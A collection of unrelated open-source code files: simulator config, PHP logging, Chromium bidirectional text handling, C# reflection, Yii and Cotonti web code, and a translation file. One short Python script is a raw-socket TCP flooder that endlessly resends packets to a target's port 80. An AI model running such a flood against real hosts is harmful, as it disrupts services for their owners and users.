    """
    Create a Root object containing two systems connected by an Ethernet
    link (test system and drive system), optionally dumping the Ethernet
    traffic to a pcap-style file.
    """
    self = Root(full_system = full_system)
    self.testsys = testSystem
    self.drivesys = driveSystem
    self.etherlink = EtherLink()
    if hasattr(testSystem, 'realview'):
        self.etherlink.int0 = Parent.testsys.realview.ethernet.interface
        self.etherlink.int1 = Parent.drivesys.realview.ethernet.interface
    elif hasattr(testSystem, 'tsunami'):
        self.etherlink.int0 = Parent.testsys.tsunami.ethernet.interface
        self.etherlink.int1 = Parent.drivesys.tsunami.ethernet.interface
    else:
        fatal("Don't know how to connect these system together")
    if dumpfile:
        self.etherdump = EtherDump(file=dumpfile)
        self.etherlink.dump = Parent.etherdump
    return self
| lokeshjindal15/gem5_transform | configs/common/FSConfig.py | Python | bsd-3-clause | 21,365 |
from tcp_ip_raw_socket import *
def main():
    # NOTE(review): floods a target with raw TCP packets until interrupted.
    # Raw sockets require root privileges. Argument order of buildPacket
    # appears to be (src, dst, sport, dport, payload) -- confirm against
    # tcp_ip_raw_socket.
    fd = createSocket()
    pkt = buildPacket("10.1.1.2", "10.1.1.1", 54321, 80, "Hello, how are you?")
    try:
        print "Starting flood"
        # Re-send the same pre-built packet as fast as possible until Ctrl-C.
        while True:
            sendPacket(fd, pkt, "10.1.1.2")
    except KeyboardInterrupt:
        print "Closing..."
if __name__ == "__main__":
    main()
<?php
/**
* Garp_Log
* class description
*
* @package Garp
* @author Harmen Janssen <harmen@grrr.nl>
*/
class Garp_Log extends Zend_Log {
    /**
     * Shortcut to fetching a configured logger instance.
     *
     * When $config is a string it is treated as a filename inside the
     * logging directory and a default stream-writer configuration is built
     * for it; otherwise it is forwarded to Zend_Log::factory() unchanged.
     *
     * @param string|array|Zend_Config $config Filename, array or instance of Zend_Config
     * @return Zend_Log
     */
    static public function factory($config = array()) {
        if (is_string($config)) {
            // Assume $config is a filename
            $filename = $config;
            $config = array(
                'timestampFormat' => 'Y-m-d',
                array(
                    'writerName' => 'Stream',
                    'writerParams' => array(
                        'stream' => self::_getLoggingDirectory() . DIRECTORY_SEPARATOR . $filename
                    )
                )
            );
        }
        return parent::factory($config);
    }

    /**
     * Resolve the directory that log files are written to.
     *
     * Defaults to APPLICATION_PATH/data/logs/ unless overridden through the
     * logging.directory config key. The directory is created on a
     * best-effort basis.
     *
     * @return string
     */
    static protected function _getLoggingDirectory() {
        $target = APPLICATION_PATH . '/data/logs/';
        if (Zend_Registry::isRegistered('config')
            && !empty(Zend_Registry::get('config')->logging->directory)
        ) {
            $target = Zend_Registry::get('config')->logging->directory;
        }
        if (!is_dir($target)) {
            // Create intermediate directories too (the old non-recursive
            // mkdir silently failed when a parent was missing); errors stay
            // suppressed to preserve the best-effort behavior.
            @mkdir($target, 0777, true);
        }
        return $target;
    }
}
| grrr-amsterdam/garp3 | library/Garp/Log.php | PHP | bsd-3-clause | 1,317 |
// Copyright (c) 2014, Sailing Lab
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// 1. Redistributions of source code must retain the above copyright notice,
// this list of conditions and the following disclaimer.
//
// 2. Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
//
// 3. Neither the name of the <ORGANIZATION> nor the names of its contributors
// may be used to endorse or promote products derived from this software
// without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
#pragma once

// size_t was used without including any header that declares it; pull in
// <cstddef> explicitly instead of relying on transitive includes.
#include <cstddef>

namespace petuum {

// Number of bits per byte.
const std::size_t kNumBitsPerByte = 8;

// 2^10, the scaling factor between adjacent byte-size units (KB, MB, ...).
const std::size_t kTwoToPowerTen = 1024;

// Growth factor applied when a cuckoo hash table is expanded.
const float kCuckooExpansionFactor = 1.428;

}   // namespace petuum
| zengjichuan/jetuum | src/petuum_ps_common/include/constants.hpp | C++ | bsd-3-clause | 1,709 |
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE TS>
<TS version="2.1" language="el_GR">
<context>
<name>XDGDesktopList</name>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="608"/>
<source>Multimedia</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="609"/>
<source>Development</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="610"/>
<source>Education</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="611"/>
<source>Games</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="612"/>
<source>Graphics</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="613"/>
<source>Network</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="614"/>
<source>Office</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="615"/>
<source>Science</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="616"/>
<source>Settings</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="617"/>
<source>System</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="618"/>
<source>Utility</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="619"/>
<source>Wine</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../../../core/libLumina/LuminaXDG.cpp" line="620"/>
<source>Unsorted</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>mainUI</name>
<message>
<location filename="../mainUI.ui" line="14"/>
<location filename="../mainUI.cpp" line="53"/>
<source>Calculator</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.ui" line="657"/>
<source>Advanced Operations</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="83"/>
<source>Percentage %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="85"/>
<source>Power %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="87"/>
<source>Base-10 Exponential %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="89"/>
<source>Exponential %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="91"/>
<source>Constant Pi %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="94"/>
<source>Square Root %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="96"/>
<source>Logarithm %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="98"/>
<source>Natural Log %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="101"/>
<source>Sine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="103"/>
<source>Cosine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="105"/>
<source>Tangent %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="108"/>
<source>Arc Sine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="110"/>
<source>Arc Cosine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="112"/>
<source>Arc Tangent %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="115"/>
<source>Hyperbolic Sine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="117"/>
<source>Hyperbolic Cosine %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="119"/>
<source>Hyperbolic Tangent %1</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../mainUI.cpp" line="182"/>
<source>Save Calculator History</source>
<translation type="unfinished"></translation>
</message>
</context>
</TS>
| cpforbes/lumina | src-qt5/desktop-utils/lumina-calculator/i18n/l-calc_el.ts | TypeScript | bsd-3-clause | 6,376 |
// Copyright (c) 2011 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "base/i18n/rtl.h"
#include "base/files/file_path.h"
#include "base/logging.h"
#include "base/strings/string_util.h"
#include "base/strings/sys_string_conversions.h"
#include "base/strings/utf_string_conversions.h"
#include "third_party/icu/source/common/unicode/locid.h"
#include "third_party/icu/source/common/unicode/uchar.h"
#include "third_party/icu/source/common/unicode/uscript.h"
#include "third_party/icu/source/i18n/unicode/coll.h"
#if defined(TOOLKIT_GTK)
#include <gtk/gtk.h>
#endif
namespace {
// Extract language, country and variant, but ignore keywords. For example,
// en-US, ca@valencia, ca-ES@valencia.
std::string GetLocaleString(const icu::Locale& locale) {
  // Renders "language[-COUNTRY][@variant]"; a missing language code becomes
  // "und" (undetermined). Keywords are deliberately not included.
  const char* lang = locale.getLanguage();
  const char* country = locale.getCountry();
  const char* variant = locale.getVariant();

  std::string result = (lang && *lang) ? lang : "und";

  if (country && *country) {
    result.append(1, '-');
    result.append(country);
  }

  if (variant && *variant) {
    std::string lowered(variant);
    StringToLowerASCII(&lowered);
    result.append(1, '@');
    result.append(lowered);
  }
  return result;
}
// Returns LEFT_TO_RIGHT or RIGHT_TO_LEFT if |character| has strong
// directionality, returns UNKNOWN_DIRECTION if it doesn't. Please refer to
// http://unicode.org/reports/tr9/ for more information.
base::i18n::TextDirection GetCharacterDirection(UChar32 character) {
  // Ask ICU for the Unicode BiDi class of the code point and collapse it
  // onto our coarse three-way direction enum.
  const int32_t bidi_class =
      u_getIntPropertyValue(character, UCHAR_BIDI_CLASS);
  switch (bidi_class) {
    case U_RIGHT_TO_LEFT:
    case U_RIGHT_TO_LEFT_ARABIC:
    case U_RIGHT_TO_LEFT_EMBEDDING:
    case U_RIGHT_TO_LEFT_OVERRIDE:
      return base::i18n::RIGHT_TO_LEFT;
    case U_LEFT_TO_RIGHT:
    case U_LEFT_TO_RIGHT_EMBEDDING:
    case U_LEFT_TO_RIGHT_OVERRIDE:
      return base::i18n::LEFT_TO_RIGHT;
    default:
      // Everything else (neutrals, weak types, ...) has no strong direction.
      return base::i18n::UNKNOWN_DIRECTION;
  }
}
} // namespace
namespace base {
namespace i18n {
// Represents the locale-specific ICU text direction.
static TextDirection g_icu_text_direction = UNKNOWN_DIRECTION;
// Returns the current ICU default locale rendered as a string, e.g. "en-US"
// or "ca-ES@valencia" (see GetLocaleString for the exact format).
std::string GetConfiguredLocale() {
  return GetLocaleString(icu::Locale::getDefault());
}
// Returns the ICU-canonicalized form of |locale| rendered as a string.
std::string GetCanonicalLocale(const char* locale) {
  return GetLocaleString(icu::Locale::createCanonical(locale));
}
// Converts a Chrome locale name to an ICU locale name. The only special
// handling here is for Spanish ("es" and "es-419"); all other names pass
// through unchanged.
std::string ICULocaleName(const std::string& locale_string) {
  // If not Spanish, just return it.
  if (locale_string.substr(0, 2) != "es")
    return locale_string;
  // Expand es to es-ES.
  if (LowerCaseEqualsASCII(locale_string, "es"))
    return "es-ES";
  // Map es-419 (Latin American Spanish) to es-FOO depending on the system
  // locale.  If it's es-RR other than es-ES, map to es-RR. Otherwise, map
  // to es-MX (the most populous in Spanish-speaking Latin America).
  if (LowerCaseEqualsASCII(locale_string, "es-419")) {
    const icu::Locale& locale = icu::Locale::getDefault();
    std::string language = locale.getLanguage();
    const char* country = locale.getCountry();
    if (LowerCaseEqualsASCII(language, "es") &&
      !LowerCaseEqualsASCII(country, "es")) {
      language += '-';
      language += country;
      return language;
    }
    return "es-MX";
  }
  // Currently, Chrome has only "es" and "es-419", but later we may have
  // more specific "es-RR".
  return locale_string;
}
// Sets the ICU default locale from a Chrome locale name and invalidates the
// cached text direction so it is recomputed on the next ICUIsRTL() call.
void SetICUDefaultLocale(const std::string& locale_string) {
  icu::Locale locale(ICULocaleName(locale_string).c_str());
  UErrorCode error_code = U_ZERO_ERROR;
  icu::Locale::setDefault(locale, error_code);
  // This return value is actually bogus because Locale object is
  // an ID and setDefault seems to always succeed (regardless of the
  // presence of actual locale data). However,
  // it does not hurt to have it as a sanity check.
  DCHECK(U_SUCCESS(error_code));
  g_icu_text_direction = UNKNOWN_DIRECTION;
}
// Returns true if the UI is right-to-left. On GTK this follows the toolkit's
// default widget direction; elsewhere it falls back to the ICU locale.
bool IsRTL() {
#if defined(TOOLKIT_GTK)
  GtkTextDirection gtk_dir = gtk_widget_get_default_direction();
  return gtk_dir == GTK_TEXT_DIR_RTL;
#else
  return ICUIsRTL();
#endif
}
// Returns true if the ICU default locale is right-to-left. The result is
// cached in g_icu_text_direction until SetICUDefaultLocale() resets it.
bool ICUIsRTL() {
  if (g_icu_text_direction == UNKNOWN_DIRECTION) {
    const icu::Locale& locale = icu::Locale::getDefault();
    g_icu_text_direction = GetTextDirectionForLocale(locale.getName());
  }
  return g_icu_text_direction == RIGHT_TO_LEFT;
}
// Queries ICU for the character orientation of |locale_name|.
TextDirection GetTextDirectionForLocale(const char* locale_name) {
  UErrorCode status = U_ZERO_ERROR;
  ULayoutType layout_dir = uloc_getCharacterOrientation(locale_name, &status);
  DCHECK(U_SUCCESS(status));
  // Treat anything other than RTL as LTR.
  return (layout_dir != ULOC_LAYOUT_RTL) ? LEFT_TO_RIGHT : RIGHT_TO_LEFT;
}
TextDirection GetFirstStrongCharacterDirection(const string16& text) {
  // Scan code points from the front and return the direction of the first
  // one with strong directionality; default to LTR when none is found.
  const UChar* data = text.c_str();
  const size_t length = text.length();
  for (size_t index = 0; index < length; ) {
    UChar32 code_point;
    // U16_NEXT advances |index| past the (possibly surrogate-pair) code
    // point it decodes.
    U16_NEXT(data, index, length, code_point);
    const TextDirection direction = GetCharacterDirection(code_point);
    if (direction != UNKNOWN_DIRECTION)
      return direction;
  }
  return LEFT_TO_RIGHT;
}
// Returns the direction of the last code point with strong directionality,
// scanning backwards; defaults to LEFT_TO_RIGHT when none is found.
TextDirection GetLastStrongCharacterDirection(const string16& text) {
  const UChar* string = text.c_str();
  size_t position = text.length();
  while (position > 0) {
    UChar32 character;
    size_t prev_position = position;
    // U16_PREV moves |prev_position| back over one code point and decodes it.
    U16_PREV(string, 0, prev_position, character);
    TextDirection direction = GetCharacterDirection(character);
    if (direction != UNKNOWN_DIRECTION)
      return direction;
    position = prev_position;
  }
  return LEFT_TO_RIGHT;
}
// Returns the single direction shared by all strong characters in |text|:
// UNKNOWN_DIRECTION if both LTR and RTL strong characters are present, and
// LEFT_TO_RIGHT if no strong characters are present at all.
TextDirection GetStringDirection(const string16& text) {
  const UChar* string = text.c_str();
  size_t length = text.length();
  size_t position = 0;
  TextDirection result(UNKNOWN_DIRECTION);
  while (position < length) {
    UChar32 character;
    size_t next_position = position;
    U16_NEXT(string, next_position, length, character);
    TextDirection direction = GetCharacterDirection(character);
    if (direction != UNKNOWN_DIRECTION) {
      // A second, conflicting strong direction makes the result mixed.
      if (result != UNKNOWN_DIRECTION && result != direction)
        return UNKNOWN_DIRECTION;
      result = direction;
    }
    position = next_position;
  }
  // Handle the case of a string not containing any strong directionality
  // characters defaulting to LEFT_TO_RIGHT.
  if (result == UNKNOWN_DIRECTION)
    return LEFT_TO_RIGHT;
  return result;
}
#if defined(OS_WIN)
// Windows: wrap |text| with bidi formatting characters when the UI is RTL.
// Returns false (and leaves |text| untouched) in an LTR UI or for an empty
// string.
bool AdjustStringForLocaleDirection(string16* text) {
  if (!IsRTL() || text->empty())
    return false;
  // Marking the string as LTR if the locale is RTL and the string does not
  // contain strong RTL characters. Otherwise, mark the string as RTL.
  bool has_rtl_chars = StringContainsStrongRTLChars(*text);
  if (!has_rtl_chars)
    WrapStringWithLTRFormatting(text);
  else
    WrapStringWithRTLFormatting(text);
  return true;
}
// Windows: inverse of AdjustStringForLocaleDirection. Only strips in an RTL
// UI, mirroring the condition under which wrapping was applied.
bool UnadjustStringForLocaleDirection(string16* text) {
  if (!IsRTL() || text->empty())
    return false;
  *text = StripWrappingBidiControlCharacters(*text);
  return true;
}
#else
bool AdjustStringForLocaleDirection(string16* text) {
  // On OS X & GTK the directionality of a label is determined by the first
  // strongly directional character.
  // However, we want to make sure that in an LTR-language-UI all strings are
  // left aligned and vice versa.
  // A problem can arise if we display a string which starts with user input.
  // User input may be of the opposite directionality to the UI. So the whole
  // string will be displayed in the opposite directionality, e.g. if we want to
  // display in an LTR UI [such as US English]:
  //
  // EMAN_NOISNETXE is now installed.
  //
  // Since EXTENSION_NAME begins with a strong RTL char, the label's
  // directionality will be set to RTL and the string will be displayed visually
  // as:
  //
  // .is now installed EMAN_NOISNETXE
  //
  // In order to solve this issue, we prepend an LRM to the string. An LRM is a
  // strongly directional LTR char.
  // We also append an LRM at the end, which ensures that we're in an LTR
  // context.
  // Unlike Windows, Linux and OS X can correctly display RTL glyphs out of the
  // box so there is no issue with displaying zero-width bidi control characters
  // on any system.  Thus no need for the !IsRTL() check here.
  if (text->empty())
    return false;
  bool ui_direction_is_rtl = IsRTL();
  bool has_rtl_chars = StringContainsStrongRTLChars(*text);
  if (!ui_direction_is_rtl && has_rtl_chars) {
    // LTR UI, RTL content: embed as RTL but bracket with LRMs so the
    // surrounding context stays LTR.
    WrapStringWithRTLFormatting(text);
    text->insert(0U, 1U, kLeftToRightMark);
    text->push_back(kLeftToRightMark);
  } else if (ui_direction_is_rtl && has_rtl_chars) {
    // RTL UI, RTL content: embed as RTL, bracketed with RLMs.
    WrapStringWithRTLFormatting(text);
    text->insert(0U, 1U, kRightToLeftMark);
    text->push_back(kRightToLeftMark);
  } else if (ui_direction_is_rtl) {
    // RTL UI, LTR-only content: embed as LTR, bracketed with RLMs.
    WrapStringWithLTRFormatting(text);
    text->insert(0U, 1U, kRightToLeftMark);
    text->push_back(kRightToLeftMark);
  } else {
    // LTR UI, LTR-only content: nothing to do.
    return false;
  }
  return true;
}
// POSIX: inverse of AdjustStringForLocaleDirection. Strips the optional
// leading/trailing LRM/RLM added above, then the embedding pair.
bool UnadjustStringForLocaleDirection(string16* text) {
  if (text->empty())
    return false;
  size_t begin_index = 0;
  char16 begin = text->at(begin_index);
  if (begin == kLeftToRightMark ||
      begin == kRightToLeftMark) {
    ++begin_index;
  }
  size_t end_index = text->length() - 1;
  char16 end = text->at(end_index);
  if (end == kLeftToRightMark ||
      end == kRightToLeftMark) {
    --end_index;
  }
  string16 unmarked_text =
      text->substr(begin_index, end_index - begin_index + 1);
  *text = StripWrappingBidiControlCharacters(unmarked_text);
  return true;
}
#endif  // !OS_WIN
bool StringContainsStrongRTLChars(const string16& text) {
const UChar* string = text.c_str();
size_t length = text.length();
size_t position = 0;
while (position < length) {
UChar32 character;
size_t next_position = position;
U16_NEXT(string, next_position, length, character);
// Now that we have the character, we use ICU in order to query for the
// appropriate Unicode BiDi character type.
int32_t property = u_getIntPropertyValue(character, UCHAR_BIDI_CLASS);
if ((property == U_RIGHT_TO_LEFT) || (property == U_RIGHT_TO_LEFT_ARABIC))
return true;
position = next_position;
}
return false;
}
void WrapStringWithLTRFormatting(string16* text) {
  // Nothing to embed for an empty string.
  if (text->empty())
    return;
  // LRE (Left-To-Right Embedding) in front, matching PDF (Pop Directional
  // Formatting) at the back.
  text->insert(text->begin(), kLeftToRightEmbeddingMark);
  text->push_back(kPopDirectionalFormatting);
}
void WrapStringWithRTLFormatting(string16* text) {
  // Nothing to embed for an empty string.
  if (text->empty())
    return;
  // RLE (Right-To-Left Embedding) in front, matching PDF (Pop Directional
  // Formatting) at the back.
  text->insert(text->begin(), kRightToLeftEmbeddingMark);
  text->push_back(kPopDirectionalFormatting);
}
// Appends |path|, wrapped in an LRE...PDF pair, to |rtl_safe_path| so that a
// file path always renders left-to-right regardless of UI direction. The
// path is converted to UTF-16 in a platform-specific way.
void WrapPathWithLTRFormatting(const FilePath& path,
                               string16* rtl_safe_path) {
  // Wrap the overall path with LRE-PDF pair which essentialy marks the
  // string as a Left-To-Right string.
  // Inserting an LRE (Left-To-Right Embedding) mark as the first character.
  rtl_safe_path->push_back(kLeftToRightEmbeddingMark);
#if defined(OS_MACOSX)
    rtl_safe_path->append(UTF8ToUTF16(path.value()));
#elif defined(OS_WIN)
    rtl_safe_path->append(path.value());
#else  // defined(OS_POSIX) && !defined(OS_MACOSX)
    std::wstring wide_path = base::SysNativeMBToWide(path.value());
    rtl_safe_path->append(WideToUTF16(wide_path));
#endif
  // Inserting a PDF (Pop Directional Formatting) mark as the last character.
  rtl_safe_path->push_back(kPopDirectionalFormatting);
}
string16 GetDisplayStringInLTRDirectionality(const string16& text) {
  // In an RTL UI every string gets wrapped (it may be appended to an RTL
  // string); in an LTR UI only strings whose first strong character is RTL
  // do. Otherwise the input is returned unchanged.
  const bool needs_wrapping =
      IsRTL() || GetFirstStrongCharacterDirection(text) == RIGHT_TO_LEFT;
  if (!needs_wrapping)
    return text;
  string16 wrapped(text);
  WrapStringWithLTRFormatting(&wrapped);
  return wrapped;
}
// Returns |text| with at most one leading embedding/override mark and one
// trailing PDF removed — i.e. undoes a single WrapStringWith*Formatting.
string16 StripWrappingBidiControlCharacters(const string16& text) {
  if (text.empty())
    return text;
  size_t begin_index = 0;
  char16 begin = text[begin_index];
  if (begin == kLeftToRightEmbeddingMark ||
      begin == kRightToLeftEmbeddingMark ||
      begin == kLeftToRightOverride ||
      begin == kRightToLeftOverride)
    ++begin_index;
  size_t end_index = text.length() - 1;
  if (text[end_index] == kPopDirectionalFormatting)
    --end_index;
  return text.substr(begin_index, end_index - begin_index + 1);
}
} // namespace i18n
} // namespace base
| ChromiumWebApps/chromium | base/i18n/rtl.cc | C++ | bsd-3-clause | 13,232 |
using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.Diagnostics;
using System.Reflection;
namespace AppGene.Common.Entities.Infrastructure.Inferences
{
    /// <summary>
    /// Resolves which properties of an entity type should be used as its
    /// "reference" (display) columns, preferring an explicit
    /// <see cref="DisplayColumnAttribute"/> and falling back to
    /// characteristically-named properties ("Code", "Name").
    /// </summary>
    public class ReferencePropertyGetter
    {
        /// <summary>
        /// Gets the reference columns.
        /// </summary>
        /// <param name="context">The entity analysis context.</param>
        /// <returns>The reference columns (possibly empty, never null).</returns>
        public virtual IList<PropertyInfo> GetProperties(EntityAnalysisContext context)
        {
            var displayProperties = new List<PropertyInfo>();

            // First preference: an explicit DisplayColumnAttribute on the
            // entity type. Its DisplayColumn value is a comma-separated list
            // of property names.
            var displayColumnAttribute = context.EntityType.GetCustomAttribute<DisplayColumnAttribute>();
            if (displayColumnAttribute != null)
            {
                string[] displayColumns = displayColumnAttribute.DisplayColumn.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
                foreach (var column in displayColumns)
                {
                    var columnName = column.Trim();
                    // Each listed name is expected to exist on the entity type.
                    PropertyInfo displayProperty = context.EntityType.GetProperty(columnName);
                    Debug.Assert(displayProperty != null);
                    displayProperties.Add(displayProperty);
                }
                if (displayProperties.Count > 0)
                {
                    // Return
                    return displayProperties;
                }
            }

            // Fallback: look for properties matching the characteristic names
            // below, preserving the order "Code" before "Name".
            string[] displayCharacteristic = new string[] { "Code", "Name" };
            var properties = EntityAnalysisHelper.GetCharacteristicPropertyInfo(context.EntityType, displayCharacteristic);
            foreach (var character in displayCharacteristic)
            {
                PropertyInfo property;
                if (properties.TryGetValue(character, out property))
                {
                    displayProperties.Add(property);
                }
            }
            return displayProperties;
        }
    }
} | snyang/AppGene | Development/AppGene/AppGene.Common.Entities.Infrastructure/Inferences/ReferencePropertyGetter.cs | C# | bsd-3-clause | 2,191 |
<?php
/**
* [BEGIN_COT_EXT]
* Hooks=page.add.tags, page.edit.tags
* [END_COT_EXT]
*/
/**
* plugin landingextrapage for Cotonti Siena
*
* @package landingextrapage
* @version 1.0.0
* @author esclkm
* @copyright
* @license BSD
* */
// Generated by Cotonti developer tool (littledev.ru)
// Abort unless we are running inside Cotonti (direct access protection).
defined('COT_CODE') or die('Wrong URL.');
// Load the plugin's language strings and its shared include file.
require_once cot_langfile('landingextrapage', 'plug');
require_once cot_incfile('landingextrapage', 'plug');
// Build the editor widget from the page's stored value and expose it to the
// template as the LANDINGINDEXPAGE tag. $pag and $t come from the page
// add/edit hook environment.
$lep = new landingextrapage($pag['page_landingextrapage']);
$t->assign('LANDINGINDEXPAGE', $lep->editform());
| esclkm/hod | plugins/landingextrapage/landingextrapage.page.add.tags.php | PHP | bsd-3-clause | 568 |
<?php
namespace backend\models;
use Yii;
use yii\base\Model;
use yii\data\ActiveDataProvider;
use common\models\Post;
/**
 * PostSearch represents the model behind the search form about `common\models\Post`.
 *
 * It validates incoming grid-filter parameters and builds an
 * ActiveDataProvider with the corresponding query conditions.
 */
class PostSearch extends Post
{
    /**
     * @inheritdoc
     *
     * Integer columns are filtered exactly; title/excerpt/body get LIKE
     * matching in search(); the publish dates are passed through as-is.
     */
    public function rules()
    {
        return [
            [['id', 'created_by', 'blog_category_id', 'status', 'comment_status', 'comment_count', 'views'], 'integer'],
            [['title', 'excerpt', 'body', 'publish_up', 'publish_down'], 'safe'],
        ];
    }
    /**
     * @inheritdoc
     */
    public function scenarios()
    {
        // bypass scenarios() implementation in the parent class
        return Model::scenarios();
    }
    /**
     * Creates data provider instance with search query applied
     *
     * @param array $params request parameters (typically Yii::$app->request->queryParams)
     *
     * @return ActiveDataProvider
     */
    public function search($params)
    {
        $query = Post::find();
        // add conditions that should always apply here
        $dataProvider = new ActiveDataProvider([
            'query' => $query,
        ]);
        $this->load($params);
        if (!$this->validate()) {
            // uncomment the following line if you do not want to return any records when validation fails
            // $query->where('0=1');
            return $dataProvider;
        }
        // grid filtering conditions: exact matches for ids, flags and dates.
        $query->andFilterWhere([
            'id' => $this->id,
            'created_by' => $this->created_by,
            'blog_category_id' => $this->blog_category_id,
            'status' => $this->status,
            'comment_status' => $this->comment_status,
            'comment_count' => $this->comment_count,
            'views' => $this->views,
            'publish_up' => $this->publish_up,
            'publish_down' => $this->publish_down,
        ]);
        // Substring matching for the free-text columns.
        $query->andFilterWhere(['like', 'title', $this->title])
            ->andFilterWhere(['like', 'excerpt', $this->excerpt])
            ->andFilterWhere(['like', 'body', $this->body]);
        return $dataProvider;
    }
}
| rob94/BlogYii | backend/models/PostSearch.php | PHP | bsd-3-clause | 2,100 |
<?php
use yii\helpers\Html;
use yii\grid\GridView;
/* @var $this yii\web\View */
/* @var $searchModel backend\models\FilialSearch */
/* @var $dataProvider yii\data\ActiveDataProvider */
// NOTE(review): "Филилы" looks like a typo for "Филиалы" — confirm before
// changing, since this is a user-visible page title.
$this->title = 'Филилы организаций';
$this->params['breadcrumbs'][] = $this->title;
// Only managers get the edit action in the grid; everyone else is read-only.
if (Yii::$app->user->can('manager'))
    $template = '{view} - {update}';
else
    $template = '{view}';
?>
<div class="filial-index">
<h1><?= Html::encode($this->title) ?></h1>
<?php // echo $this->render('_search', ['model' => $searchModel]); ?>
<p>
<?php if (Yii::$app->user->can('manager')) echo Html::a('Создать филиал', ['create'], ['class' => 'btn btn-success']) ?>
</p>
<?= GridView::widget([
'dataProvider' => $dataProvider,
'filterModel' => $searchModel,
'columns' => [
['class' => 'yii\grid\SerialColumn'],
[
'attribute' => 'idCompany',
'value' => 'idCompany.name',
// 'filter'=>$searchModel->getAllCompanyGrid(),
],
[
'attribute' => 'idTown',
'value' => 'idTown.name',
// 'filter'=>$searchModel->getAllPlacetownGrid(),
],
'address',
// 'info',
['class' => 'yii\grid\ActionColumn',
'header'=>'Действия',
'headerOptions' => ['width' => '80'],
'template' => $template,
],
],
]); ?>
</div> | N1kolayS/PCExpert | backend/views/filial/index.php | PHP | bsd-3-clause | 1,530 |
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "ui/base/dragdrop/os_exchange_data_provider_win.h"
#include <algorithm>
#include <vector>
#include "base/file_path.h"
#include "base/i18n/file_util_icu.h"
#include "base/logging.h"
#include "base/memory/scoped_handle.h"
#include "base/pickle.h"
#include "base/stl_util.h"
#include "base/utf_string_conversions.h"
#include "base/win/scoped_hglobal.h"
#include "googleurl/src/gurl.h"
#include "grit/ui_strings.h"
#include "net/base/net_util.h"
#include "ui/base/clipboard/clipboard_util_win.h"
#include "ui/base/l10n/l10n_util.h"
namespace ui {
